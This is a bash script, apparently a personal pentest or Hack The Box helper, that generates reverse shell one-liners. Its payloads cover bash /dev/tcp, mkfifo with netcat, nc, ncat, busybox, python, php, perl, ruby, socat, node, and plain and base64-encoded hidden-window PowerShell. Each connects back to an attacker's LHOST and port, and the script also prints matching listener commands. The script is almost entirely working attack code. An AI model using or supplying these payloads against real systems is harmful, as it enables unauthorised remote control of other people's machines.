revshell.sh (4142B)
1 # revshell — reverse shell one-liners for the box you are on. 2 # 3 # revshell pick a type (gum) 4 # revshell bash [port] one payload; LPORT from the arg, $LPORT, or 4444 5 # revshell ls the types 6 # revshell all [port] every payload 7 # revshell -c bash ...and copy it (wl-copy) 8 # 9 # LHOST is $LHOST if set, else the HTB tunnel address (htbip). The payload goes 10 # to stdout and nothing else does, so `revshell bash | wl-copy` and 11 # `$(revshell ps64)` work; the matching listener is printed on stderr. 12 # 13 # Ported from IceBreaker's scripts/revshell.sh; LHOST now comes from htbip 14 # rather than a hardcoded tun0/tun1/eth0 probe. 15 16 types=(bash bash-c bash-url mkfifo nc ncat busybox python php perl ruby socat node ps ps64) 17 18 copy=0 19 if [ "${1:-}" = "-c" ]; then copy=1; shift; fi 20 21 case "${1:-}" in 22 -h | --help) 23 echo "usage: revshell [-c] [type|ls|all] [port] (LHOST: \$LHOST or htbip)" 24 exit 0 25 ;; 26 ls | list | -l) 27 printf '%s\n' "${types[@]}" 28 exit 0 29 ;; 30 esac 31 32 LHOST=${LHOST:-$(htbip 2>/dev/null || true)} 33 if [ -z "$LHOST" ]; then 34 echo "revshell: no LHOST — bring the VPN up (htbup) or export LHOST=<ip>" >&2 35 exit 1 36 fi 37 LPORT=${2:-${LPORT:-4444}} 38 case "$LPORT" in 39 '' | *[!0-9]*) echo "revshell: not a port: $LPORT" >&2; exit 2 ;; 40 esac 41 42 ps_raw() { 43 # Single-quoted on purpose: these $ are PowerShell's, not ours. 44 # shellcheck disable=SC2016 45 printf '$c=New-Object Net.Sockets.TCPClient("%s",%s);$s=$c.GetStream();[byte[]]$b=0..65535|%%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|Out-String)+"PS "+(pwd).Path+"> ";$x=([Text.Encoding]::ASCII).GetBytes($o);$s.Write($x,0,$x.Length);$s.Flush()};$c.Close()' "$LHOST" "$LPORT" 46 } 47 48 payload() { 49 local H=$LHOST P=$LPORT 50 case "$1" in 51 bash) echo "bash -i >& /dev/tcp/$H/$P 0>&1" ;; 52 bash-c) echo "bash -c 'bash -i >& /dev/tcp/$H/$P 0>&1'" ;; 53 bash-url) printf '%s' "bash -c 'bash -i >& /dev/tcp/$H/$P 0>&1'" | jq -sRr @uri ;; 54 mkfifo) echo "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $H $P >/tmp/f" ;; 55 nc) echo "nc -e /bin/sh $H $P" ;; 56 ncat) echo "ncat $H $P -e /bin/sh" ;; 57 busybox) echo "busybox nc $H $P -e /bin/sh" ;; 58 python) echo "python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"$H\",$P));[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn(\"/bin/bash\")'" ;; 59 php) echo "php -r '\$s=fsockopen(\"$H\",$P);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" ;; 60 perl) echo "perl -e 'use Socket;\$i=\"$H\";\$p=$P;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'" ;; 61 ruby) echo "ruby -rsocket -e'f=TCPSocket.open(\"$H\",$P).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'" ;; 62 socat) echo "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$H:$P" ;; 63 node) echo "node -e 'sh=require(\"child_process\").spawn(\"/bin/sh\");c=require(\"net\").connect($P,\"$H\",()=>{c.pipe(sh.stdin);sh.stdout.pipe(c);sh.stderr.pipe(c)})'" ;; 64 ps) printf 'powershell -nop -c "%s"\n' "$(ps_raw)" ;; 65 ps64) printf 'powershell -nop -w hidden -enc %s\n' "$(ps_raw | iconv -f UTF-8 -t UTF-16LE | base64 -w0)" ;; 66 *) echo "revshell: unknown type '$1' (revshell ls)" >&2; return 2 ;; 67 esac 68 } 69 70 listener() { 71 case "$1" in 72 socat) echo "listen: socat file:\$(tty),raw,echo=0 tcp-listen:$LPORT" >&2 ;; 73 python) echo "listen: nc -lvnp $LPORT (already a pty — stty raw -echo; fg after ^Z)" >&2 ;; 74 *) echo "listen: rlwrap -cAr nc -lvnp $LPORT" >&2 ;; 75 esac 76 } 77 78 type=${1:-} 79 if [ -z "$type" ]; then 80 type=$(printf '%s\n' "${types[@]}" | gum choose --header "revshell → $LHOST:$LPORT") || exit 130 81 fi 82 83 if [ "$type" = all ]; then 84 for t in "${types[@]}"; do 85 printf '# %s\n' "$t" 86 payload "$t" 87 done 88 listener nc 89 exit 0 90 fi 91 92 out=$(payload "$type") || exit $? 93 printf '%s\n' "$out" 94 listener "$type" 95 if [ "$copy" = 1 ]; then 96 printf '%s' "$out" | wl-copy && echo "copied." >&2 97 fi